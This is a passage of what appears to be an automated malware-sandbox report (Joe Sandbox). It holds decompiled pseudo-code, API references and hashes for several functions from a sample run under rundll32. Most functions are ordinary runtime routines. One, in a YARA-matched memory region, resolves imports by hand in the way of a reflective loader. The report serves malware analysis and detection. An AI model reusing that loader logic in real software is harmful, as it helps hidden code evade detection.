						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x2865bc0; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x2865bcc; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x2865bc4; // 0x0
				_t1 = _t155 + 4; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *_t1 ^ __edx) - __edx;
				_t166 = _t65 -  *0x2865bcc; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                          0x0282b63e
                          0x0282b647
                          0x0282b676
                          0x0282b676
                          0x0282b67c
                          0x0282b692
                          0x0282b69b
                          0x0282b69d
                          0x0282b6a4
                          0x0282b6a6
                          0x0282b6ac
                          0x0282b6b9
                          0x0282b6be
                          0x0282b6be
                          0x0282b6a4
                          0x0282b6c3
                          0x0282b6cf
                          0x0282b6df
                          0x0282b6e6
                          0x0282b6e6
                          0x0282b6e6
                          0x0282b6eb
                          0x0282b6d1
                          0x0282b6d1
                          0x0282b6d8
                          0x0282b6d8
                          0x0282b6f2
                          0x0282b6fa
                          0x0282b747
                          0x0282b747
                          0x0282b74e
                          0x0282b751
                          0x0282b754
                          0x0282b757
                          0x0282b760
                          0x0282b768
                          0x0282b770
                          0x0282b775
                          0x0282b77e
                          0x0282b785
                          0x0282b785
                          0x0282b788
                          0x0282b793
                          0x0282b795
                          0x0282b797
                          0x0282b7a1
                          0x0282b7aa
                          0x0282b7ae
                          0x0282b7b8
                          0x0282b7bd
                          0x0282b7c2
                          0x0282b7c7
                          0x0282b7cb
                          0x0282b7e6
                          0x0282b7e6
                          0x0282b7eb
                          0x0282b7f0
                          0x0282b7cd
                          0x0282b7cd
                          0x0282b7d1
                          0x0282b7d8
                          0x0282b7da
                          0x0282b7df
                          0x0282b7df
                          0x0282b7f7
                          0x0282b7f7
                          0x0282b7fc
                          0x0282b804
                          0x0282b811
                          0x0282b811
                          0x0282b7ae
                          0x0282b819
                          0x0282b826
                          0x0282b832
                          0x0282b905
                          0x0282b905
                          0x0282b838
                          0x0282b838
                          0x0282b83a
                          0x0282b85b
                          0x0282b85d
                          0x0282b862
                          0x0282b865
                          0x0282b867
                          0x0282b895
                          0x0282b8a4
                          0x0282b8a9
                          0x0282b8af
                          0x0282b869
                          0x0282b871
                          0x0282b87d
                          0x0282b882
                          0x0282b888
                          0x0282b888
                          0x0282b83c
                          0x0282b83c
                          0x0282b83f
                          0x0282b842
                          0x0282b84f
                          0x0282b84f
                          0x0282b8b9
                          0x00000000
                          0x0282b8bb
                          0x0282b8bb
                          0x0282b8c1
                          0x0282b8c4
                          0x0282b8cc
                          0x0282b8d3
                          0x00000000
                          0x00000000
                          0x0282b8da
                          0x0282b8dc
                          0x0282b8e3
                          0x0282b8e3
                          0x0282b8e6
                          0x0282b8ed
                          0x0282b8f0
                          0x0282b8fb
                          0x0282b8fc
                          0x0282b8fd
                          0x0282b8fe
                          0x00000000
                          0x0282b8fe
                          0x0282b8b9
                          0x0282b832
                          0x0282b6fe
                          0x0282b70a
                          0x00000000
                          0x00000000
                          0x0282b710
                          0x0282b715
                          0x0282b718
                          0x0282b720
                          0x0282b723
                          0x0282b72a
                          0x0282b72d
                          0x0282b730
                          0x0282b735
                          0x0282b741
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0282b741
                          0x0282b649
                          0x0282b650
                          0x0282b655
                          0x0282b65b
                          0x00000000
                          0x00000000
                          0x0282b65d
                          0x0282b662
                          0x0282b665
                          0x0282b668
                          0x0282b66a
                          0x0282b670
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • GetDesktopWindow.USER32 ref: 0282B6AC
                          • GetDesktopWindow.USER32 ref: 0282B7D1
                          • SetCursor.USER32(00000000), ref: 0282B826
                            • Part of subcall function 02835AD8: 74470910.COMCTL32(00000000,?,0282B801), ref: 02835AF4
                            • Part of subcall function 02835AD8: ShowCursor.USER32(000000FF,00000000,?,0282B801), ref: 02835B0F
                          • SetCursor.USER32(00000000), ref: 0282B811
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Cursor$DesktopWindow$74470910Show
                          • String ID:
                          • API String ID: 2624501786-0
                          • Opcode ID: c7510a5c0f762beb53617aec17765c9d2a473e5b7946832d8c32239620119358
                          • Instruction ID: 1b62631e7c876eaa7e909935adcde8fc1f9898ea5d874dceac4812df3b663c8e
                          • Opcode Fuzzy Hash: c7510a5c0f762beb53617aec17765c9d2a473e5b7946832d8c32239620119358
                          • Instruction Fuzzy Hash: 1A9130BCA422528FC705DF28D288B557BE7BB48308F949994D488CB395DB78EC99CF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281743C Relevance: 6.2, APIs: 4, Instructions: 164windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E0281743C(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HMENU__* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t88;
				intOrPtr _t104;
				void* _t106;
				void* _t114;
				struct HMENU__* _t117;
				struct HMENU__* _t124;
				intOrPtr _t136;
				void* _t138;
				intOrPtr _t140;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t160;
				void* _t171;
				void* _t172;
				void* _t175;

				_t172 = __esi;
				_t171 = __edi;
				_t152 = __ebx;
				_push(__ebx);
				_v32 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t175);
				_push(0x2817660);
				_push( *[fs:eax]);
				 *[fs:eax] = _t175 + 0xffffffe4;
				if(_v12 == 0) {
					L7:
					if( *((intOrPtr*)(_v8 + 0x248)) != 0) {
						_t26 = _v8 + 0x248; // 0x74000478
						E02826E08( *_t26, 0, _t171, 0);
					}
					if(( *(_v8 + 0x1c) & 0x00000008) != 0 || _v12 != 0 && ( *(_v12 + 0x1c) & 0x00000008) != 0) {
						_v12 = 0;
					}
					 *((intOrPtr*)(_v8 + 0x248)) = _v12;
					if(_v12 != 0) {
						E027F3924(_v12, _v8);
					}
					if(_v12 == 0 || ( *(_v8 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_v8 + 0x229)) == 3) {
						_t88 = E02834254(_v8);
						__eflags = _t88;
						if(_t88 != 0) {
							SetMenu(E02833F7C(_v8), 0);
						}
						goto L30;
					} else {
						_t51 = _v8 + 0x248; // 0x74000478
						if( *((char*)( *_t51 + 0x5c)) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
							if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
								_t104 = _v8;
								__eflags =  *((char*)(_t104 + 0x22f)) - 1;
								if( *((char*)(_t104 + 0x22f)) != 1) {
									_t106 = E02834254(_v8);
									__eflags = _t106;
									if(_t106 != 0) {
										SetMenu(E02833F7C(_v8), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E02834254(_v8) != 0) {
								_t61 = _v8 + 0x248; // 0x74000478
								_t114 =  *((intOrPtr*)( *((intOrPtr*)( *_t61)) + 0x34))();
								_t117 = GetMenu(E02833F7C(_v8));
								_t197 = _t114 - _t117;
								if(_t114 != _t117) {
									_t65 = _v8 + 0x248; // 0x74000478
									_t124 =  *((intOrPtr*)( *((intOrPtr*)( *_t65)) + 0x34))();
									SetMenu(E02833F7C(_v8), _t124);
								}
								E02826E08(_v12, E02833F7C(_v8), _t171, _t197);
							}
							L30:
							if( *((char*)(_v8 + 0x22e)) != 0) {
								E02818964(_v8, 1);
							}
							E02817308(_v8);
							_pop(_t160);
							 *[fs:eax] = _t160;
							_push(0x2817667);
							return E027D40E8( &_v32);
						}
					}
				}
				_t136 =  *0x2865b5c; // 0x41d1150
				_t138 = E0281BA80(_t136) - 1;
				if(_t138 >= 0) {
					_v20 = _t138 + 1;
					_v16 = 0;
					do {
						_t140 =  *0x2865b5c; // 0x41d1150
						if( *((intOrPtr*)(E0281BA5C(_t140, _v16) + 0x248)) == _v12) {
							_t143 =  *0x2865b5c; // 0x41d1150
							if(E0281BA5C(_t143, _v16) != _v8) {
								_v28 =  *((intOrPtr*)(_v12 + 8));
								_v24 = 0xb;
								_t148 =  *0x28643d0; // 0x27f55d4
								E027D6018(_t148,  &_v32);
								E027DBC00(_t152, _v32, 1, _t171, _t172, 0,  &_v28);
								E027D3A9C();
							}
						}
						_v16 =  &(_v16->i);
						_t21 =  &_v20;
						 *_t21 = _v20 - 1;
					} while ( *_t21 != 0);
				}
			}

























                          0x0281743c
                          0x0281743c
                          0x0281743c
                          0x02817442
                          0x02817445
                          0x02817448
                          0x0281744b
                          0x02817450
                          0x02817451
                          0x02817456
                          0x02817459
                          0x02817460
                          0x028174e6
                          0x028174f0
                          0x028174f7
                          0x028174fd
                          0x028174fd
                          0x02817509
                          0x0281751c
                          0x0281751c
                          0x02817525
                          0x0281752f
                          0x02817537
                          0x02817537
                          0x02817540
                          0x02817613
                          0x02817618
                          0x0281761a
                          0x02817627
                          0x02817627
                          0x00000000
                          0x0281755f
                          0x02817562
                          0x0281756c
                          0x02817581
                          0x028175e6
                          0x028175e9
                          0x028175f0
                          0x028175f5
                          0x028175fa
                          0x028175fc
                          0x02817609
                          0x02817609
                          0x028175fc
                          0x00000000
                          0x028175f0
                          0x00000000
                          0x02817583
                          0x02817583
                          0x0281758d
                          0x02817596
                          0x0281759e
                          0x028175ac
                          0x028175b1
                          0x028175b3
                          0x028175b8
                          0x028175c0
                          0x028175cd
                          0x028175cd
                          0x028175df
                          0x028175df
                          0x0281762c
                          0x02817636
                          0x0281763d
                          0x0281763d
                          0x02817645
                          0x0281764c
                          0x0281764f
                          0x02817652
                          0x0281765f
                          0x0281765f
                          0x0281756c
                          0x02817540
                          0x02817466
                          0x02817470
                          0x02817473
                          0x02817476
                          0x02817479
                          0x02817480
                          0x02817483
                          0x02817496
                          0x0281749b
                          0x028174a8
                          0x028174b0
                          0x028174b3
                          0x028174c0
                          0x028174c5
                          0x028174d4
                          0x028174d9
                          0x028174d9
                          0x028174a8
                          0x028174de
                          0x028174e1
                          0x028174e1
                          0x028174e1
                          0x02817480

                          APIs
                          • GetMenu.USER32(00000000), ref: 028175AC
                          • SetMenu.USER32(00000000,00000000), ref: 028175CD
                          • SetMenu.USER32(00000000,00000000), ref: 02817609
                          • SetMenu.USER32(00000000,00000000), ref: 02817627
                            • Part of subcall function 027D6018: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 027D6049
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$LoadString
                          • String ID:
                          • API String ID: 3688185913-0
                          • Opcode ID: 57a992f2cefeb2a4b093dfad6011d3812833c797f5ef7cdec7a08a7127e91373
                          • Instruction ID: 7bf184c5de4d84a1f7957a50badfb642b16e4b0763aab2c8856c9a2cf6d336e9
                          • Opcode Fuzzy Hash: 57a992f2cefeb2a4b093dfad6011d3812833c797f5ef7cdec7a08a7127e91373
                          • Instruction Fuzzy Hash: D061EB7CA04108EFDB51EBA8D589B9DBBFAAF04304F6544E8E408E72A1C774AE45DF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DF340 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E027DF340(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E027DF188(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L027DE148();
							E027DF188(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L027DE150();
							E027DF188(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E027DF2E4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E027DF2B4(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L027DE178();
						E027DF188(_v780);
						E027DF538(_v792);
					}
				}
				L15:
				_push(_v776);
				L027DDCDC();
				return E027DF188(_v776);
			}






















                          0x027df34c
                          0x027df35c
                          0x027df363
                          0x027df363
                          0x027df36e
                          0x027df37c
                          0x027df38b
                          0x027df3a9
                          0x027df38d
                          0x027df398
                          0x027df398
                          0x027df3b8
                          0x027df3c4
                          0x027df3c7
                          0x027df3c9
                          0x027df3ca
                          0x027df3cc
                          0x027df3d2
                          0x027df3d4
                          0x027df3e3
                          0x027df3e4
                          0x027df3ee
                          0x027df3ef
                          0x027df3f4
                          0x027df3ff
                          0x027df400
                          0x027df40a
                          0x027df40b
                          0x027df410
                          0x027df42b
                          0x027df42d
                          0x027df42e
                          0x027df431
                          0x027df431
                          0x027df3d2
                          0x027df43a
                          0x027df43d
                          0x027df43f
                          0x027df440
                          0x027df446
                          0x027df44c
                          0x027df44e
                          0x027df450
                          0x027df453
                          0x027df456
                          0x027df456
                          0x027df459
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027df459
                          0x027df459
                          0x027df460
                          0x027df46b
                          0x027df473
                          0x027df47a
                          0x027df481
                          0x027df482
                          0x027df487
                          0x027df492
                          0x027df492
                          0x027df4a0
                          0x027df4a4
                          0x027df4aa
                          0x027df4ab
                          0x027df4bb

                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027DF3EF
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027DF40B
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027DF482
                          • VariantClear.OLEAUT32(?), ref: 027DF4AB
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ArraySafe$Bound$ClearIndexVariant
                          • String ID:
                          • API String ID: 920484758-0
                          • Opcode ID: 18b9160fed3113d412c3891d1c0f83ff0f579bb4c4ae3bd89441f87cbbf4b081
                          • Instruction ID: 1585fba4766c2adf79d18f1402f7482eb6a3c9aa8621ddd2fb975ccaafdd1a78
                          • Opcode Fuzzy Hash: 18b9160fed3113d412c3891d1c0f83ff0f579bb4c4ae3bd89441f87cbbf4b081
                          • Instruction Fuzzy Hash: 5C412875A012299FCB62EB58CD94BC9B3BDBF48314F0041D5E64AA7611DA34AF818F52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D3580 Relevance: 6.1, APIs: 4, Instructions: 105libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D3580(intOrPtr _a4) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				signed int* _v20;
				_Unknown_base(*)()* _v24;
				CHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				intOrPtr _v48;

				_v32 = _a4;
				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
				_v40 = _v36 + 0xbadc25;
				_v44 =  *_v40;
				_v8 = _a4 + _v44;
				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
					_v12 = 0;
					_v12 = GetModuleHandleA(_v28);
					if(_v12 == 0) {
						_v12 = LoadLibraryA(_v28);
					}
					if(_v12 != 0) {
						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
						_v20 = _a4 +  *_v8;
						if( *_v8 == 0) {
							_v20 = _v16;
						}
						while( *_v16 != 0) {
							_v48 = _a4 +  *_v20;
							_v24 = 0;
							if(( *_v20 & 0x80000000) == 0) {
								_v24 = GetProcAddress(_v12, _v48 + 2);
							} else {
								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
							}
							if( *_v16 != _v24) {
								 *_v16 = _v24;
							}
							_v16 = _v16 + 4;
							_v20 =  &(_v20[1]);
						}
						_v8 = _v8 + 0x14;
						continue;
					} else {
						return 0;
					}
				}
				return 1;
			}














                          0x042d3589
                          0x042d3595
                          0x042d35a7
                          0x042d35af
                          0x042d35b8
                          0x042d35bb
                          0x042d35d1
                          0x042d35d4
                          0x042d35e5
                          0x042d35ec
                          0x042d35f8
                          0x042d35f8
                          0x042d35ff
                          0x042d3611
                          0x042d361c
                          0x042d3625
                          0x042d362a
                          0x042d362a
                          0x042d362d
                          0x042d363d
                          0x042d3640
                          0x042d3651
                          0x042d367f
                          0x042d3653
                          0x042d3669
                          0x042d3669
                          0x042d368a
                          0x042d3692
                          0x042d3692
                          0x042d369a
                          0x042d36a3
                          0x042d36a3
                          0x042d36ae
                          0x00000000
                          0x042d3601
                          0x00000000
                          0x042d3601
                          0x042d35ff
                          0x00000000

                          APIs
                          • GetModuleHandleA.KERNEL32(?), ref: 042D35DF
                          • LoadLibraryA.KERNEL32(?), ref: 042D35F2
                          • GetProcAddress.KERNEL32(00000000,?), ref: 042D3663
                          • GetProcAddress.KERNEL32(00000000,?), ref: 042D3679
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleLibraryLoadModule
                          • String ID:
                          • API String ID: 384173800-0
                          • Opcode ID: b812b404f2c3554a72ddb961c62b73aac1a879eb6be8a1fee13d983e18f34122
                          • Instruction ID: 69ea5a06f25232389600d1cfed7efe607be0ee7f72bc62f428c459b254788cb7
                          • Opcode Fuzzy Hash: b812b404f2c3554a72ddb961c62b73aac1a879eb6be8a1fee13d983e18f34122
                          • Instruction Fuzzy Hash: 9F41C474E11209EFCB04CF98C884BAEBBB1FF88305F208599D915AB351D774AA81CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DB974 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027DB974(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x2865668; // 0x27d0000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E027DB968(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E027D8BEC( &_v273, 0x104, E027DC9DC(0x5c) + 1);
				_t74 = 0x27dbaf4;
				_t86 = 0x27dbaf4;
				_t83 =  *0x27d7544; // 0x27d7590
				if(E027D3398(_t87, _t83) != 0) {
					_t74 = E027D45A8( *((intOrPtr*)(_t87 + 4)));
					_t69 = E027D8B88(_t74, 0x27dbaf4);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x27dbaf8;
					}
				}
				_t51 =  *0x286475c; // 0x27d72bc
				_t16 = _t51 + 4; // 0xffeb
				_t53 =  *0x2865668; // 0x27d0000
				LoadStringA(E027D5568(_t53),  *_t16,  &_v790, 0x100);
				E027D315C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E027D9224(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E027D8B88(_v8, _t86);
			}































                          0x027db974
                          0x027db980
                          0x027db983
                          0x027db985
                          0x027db991
                          0x027db9a0
                          0x027db9ca
                          0x027db9d0
                          0x027db9dc
                          0x027db9e1
                          0x027db9e7
                          0x027db9e7
                          0x027dba05
                          0x027dba0a
                          0x027dba0f
                          0x027dba16
                          0x027dba23
                          0x027dba2d
                          0x027dba31
                          0x027dba38
                          0x027dba41
                          0x027dba41
                          0x027dba38
                          0x027dba52
                          0x027dba57
                          0x027dba5b
                          0x027dba66
                          0x027dba73
                          0x027dba7e
                          0x027dba84
                          0x027dba91
                          0x027dba97
                          0x027dbaa1
                          0x027dbaa7
                          0x027dbaae
                          0x027dbab4
                          0x027dbabb
                          0x027dbac1
                          0x027dbadd
                          0x027dbaf0

                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DB991
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DB9B5
                          • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DB9D0
                          • LoadStringA.USER32(00000000,0000FFEB,?,00000100), ref: 027DBA66
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID:
                          • API String ID: 3990497365-0
                          • Opcode ID: be3881b77907dca8ccf3935f3f40e31c66673c5786eb6c7d59cd1f393b31fb96
                          • Instruction ID: 8b50d41e1ddcc8d8613d1ce912fff04cd749dfcc7e71ca84698ebd6c43d88f88
                          • Opcode Fuzzy Hash: be3881b77907dca8ccf3935f3f40e31c66673c5786eb6c7d59cd1f393b31fb96
                          • Instruction Fuzzy Hash: 4C413B70A402589FCB22DB68DC88BDAB7FDAB58304F4410E6A548E7251D774AF84CF11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027DB972 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027DB972(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x2865668; // 0x27d0000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E027DB968(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E027D8BEC( &_v273, 0x104, E027DC9DC(0x5c) + 1);
				_t75 = 0x27dbaf4;
				_t89 = 0x27dbaf4;
				_t85 =  *0x27d7544; // 0x27d7590
				if(E027D3398(_t92, _t85) != 0) {
					_t75 = E027D45A8( *((intOrPtr*)(_t92 + 4)));
					_t69 = E027D8B88(_t75, 0x27dbaf4);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x27dbaf8;
					}
				}
				_t51 =  *0x286475c; // 0x27d72bc
				_t16 = _t51 + 4; // 0xffeb
				_t53 =  *0x2865668; // 0x27d0000
				LoadStringA(E027D5568(_t53),  *_t16,  &_v790, 0x100);
				E027D315C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E027D9224(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E027D8B88(_v8, _t89);
			}































                          0x027db980
                          0x027db983
                          0x027db985
                          0x027db991
                          0x027db9a0
                          0x027db9ca
                          0x027db9d0
                          0x027db9dc
                          0x027db9e1
                          0x027db9e7
                          0x027db9e7
                          0x027dba05
                          0x027dba0a
                          0x027dba0f
                          0x027dba16
                          0x027dba23
                          0x027dba2d
                          0x027dba31
                          0x027dba38
                          0x027dba41
                          0x027dba41
                          0x027dba38
                          0x027dba52
                          0x027dba57
                          0x027dba5b
                          0x027dba66
                          0x027dba73
                          0x027dba7e
                          0x027dba84
                          0x027dba91
                          0x027dba97
                          0x027dbaa1
                          0x027dbaa7
                          0x027dbaae
                          0x027dbab4
                          0x027dbabb
                          0x027dbac1
                          0x027dbadd
                          0x027dbaf0

                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DB991
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DB9B5
                          • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DB9D0
                          • LoadStringA.USER32(00000000,0000FFEB,?,00000100), ref: 027DBA66
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID:
                          • API String ID: 3990497365-0
                          • Opcode ID: f29f609fb3fb7a3ff6598a542f0764ff872855d49df3218a03e9460b32c2bd36
                          • Instruction ID: b9986612353fe024960aca5fbdeb65ffbe3c6b53545b88b46c1f43fd632b2828
                          • Opcode Fuzzy Hash: f29f609fb3fb7a3ff6598a542f0764ff872855d49df3218a03e9460b32c2bd36
                          • Instruction Fuzzy Hash: 89413B70A402589FDB22DB68DC88BDAB7FDAB58304F4410E6A548E7251DB74AF84CF61
